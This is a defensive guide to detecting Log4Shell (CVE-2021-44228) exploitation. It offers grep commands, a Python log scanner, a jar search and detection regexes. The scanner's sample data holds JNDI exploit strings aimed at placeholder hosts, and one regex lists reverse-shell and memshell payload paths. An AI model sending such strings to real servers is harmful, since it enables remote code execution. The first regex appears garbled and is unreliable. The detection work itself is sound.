Log4j RCE Exploitation Detection


You can use these commands and rules to search for exploitation attempts against the Log4j RCE vulnerability CVE-2021-44228.


  • RegEx
^(?:.(?:.(?:.(?:.(?:.(?=.(?:..jndi.))(?=.(?:..ldap.|..rmi.|..ldaps.|..dns.|..lower.|..upper.)))|.(?:.(?=.(?:..jndi.))(?=.(?:..ldap.|..rmi.|..ldaps.|..dns.|..lower.|..upper.)))))|.(?:.(?=.(?:..jndi.))(?=.(?:..ldap.|..rmi.|..ldaps.|..dns.|..lower.|..upper.)))))
  • Grep / Zgrep

This command searches for exploitation attempts in uncompressed files under /var/log and all of its subfolders:

sudo egrep -I -i -r '\$({|%7B)jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log

This command searches for exploitation attempts in compressed files under /var/log and all of its subfolders:

sudo find /var/log -name '*.gz' -print0 | xargs -0 zgrep -E -i '\$({|%7B)jndi:(ldap[s]?|rmi|dns):/[^\n]+'
  • Grep / Zgrep – Obfuscated Variants

These commands also catch obfuscated variants (for example the ${lower:...} nesting that the sed and tr stages strip), but because the file contents are piped through sed and tr, a match no longer reports the file name it came from.

This command searches for exploitation attempts in uncompressed files under /var/log and all of its subfolders:

sudo find /var/log/ -type f -exec sh -c "cat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -I -i 'jndi:(ldap[s]?|rmi|dns):'" \;

This command searches for exploitation attempts in compressed files under /var/log and all of its subfolders:

sudo find /var/log/ -name "*.log.gz" -type f -exec sh -c "zcat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(ldap[s]?|rmi|dns):'" \;
  • Log4Shell Detector (Python)

A Python-based scanner that detects even heavily obfuscated forms of the exploit string.

GitHub – Neo23x0/log4shell-detector: Detector for Log4Shell exploitation attempts
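
As an added example (not code from this page, and not the Neo23x0 detector), the following Python scanner applies the same idea as the sed/tr pipeline above: it URL-decodes each log line, unwraps ${lower:...}, ${upper:...} and ${...:-x} lookups until nothing changes, and only then applies the jndi:(ldap|ldaps|rmi|dns) pattern. The log lines and the example.invalid hosts are constructed sample data.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines; the hosts are placeholders, not real indicators.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://example.invalid:1389/a}"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://example.invalid:1389/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "-" "%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%3A1389%2Fa%7D"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://example.invalid:1099/x}"',
    '10.0.0.9 - - "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"',
]

# Same scheme list as the grep commands above, applied after de-obfuscation.
JNDI_RE = re.compile(r'\$\{jndi:(ldap[s]?|rmi|dns):/', re.IGNORECASE)
# Innermost ${lower:x} / ${upper:x} lookups (no nested braces inside).
LOOKUP_RE = re.compile(r'\$\{(lower|upper):([^${}]*)\}', re.IGNORECASE)
# Innermost ${name:-default} lookups, e.g. ${::-j} resolves to "j".
DEFAULT_RE = re.compile(r'\$\{[^${}]*:-([^${}]*)\}')


def normalize(line, max_rounds=20):
    """Peel off URL encoding and nested lookup obfuscation, innermost first."""
    s = unquote(unquote(line))  # handles %7B and double-encoded %257B
    for _ in range(max_rounds):
        new = LOOKUP_RE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(), s)
        new = DEFAULT_RE.sub(lambda m: m.group(1), new)
        if new == s:      # fixed point reached: no more lookups to unwrap
            break
        s = new
    return s


def scan(lines):
    """Return (line_number, normalized_line) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        normalized = normalize(line)
        if JNDI_RE.search(normalized):
            hits.append((number, normalized))
    return hits


if __name__ == "__main__":
    for number, normalized in scan(SAMPLE_LOG):
        print(f"line {number}: {normalized}")
```

Feed real files in with scan(open(path, errors="replace")), keeping the line number so the hit can be traced back, which the sed/tr pipeline above cannot do.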

  • Find Vulnerable Software (Windows)
gci 'C:\' -rec -force -include *.jar -ea 0 | foreach {select-string "JndiLookup.class" $_} | select -exp Path
  • Detects indicators of JNDI usage in log files and other payloads
ldap:\/\/[a-zA-Z0-9\.]{7,80}:[0-9]{2,5}\/(Basic\/Command\/Base64|Basic\/ReverseShell|Basic\/TomcatMemshell|Basic\/JBossMemshell|Basic\/WebsphereMemshell|Basic\/SpringMemshell|Basic\/Command|Deserialization\/CommonsCollectionsK|Deserialization\/CommonsBeanutils|Deserialization\/Jre8u20\/TomcatMemshell|Deserialization\/CVE_2020_2555\/WeblogicMemshell|TomcatBypass|GroovyBypass|WebsphereBypass)\/
  • Detects indicators in server logs that indicate the exploitation of CVE-2021-44228
$\{jndi:(ldap|ldaps|rmi|dns):\/[\/]?[a-z-\.0-9]{3,120}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}

Recommendation:

Upgrade to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later).
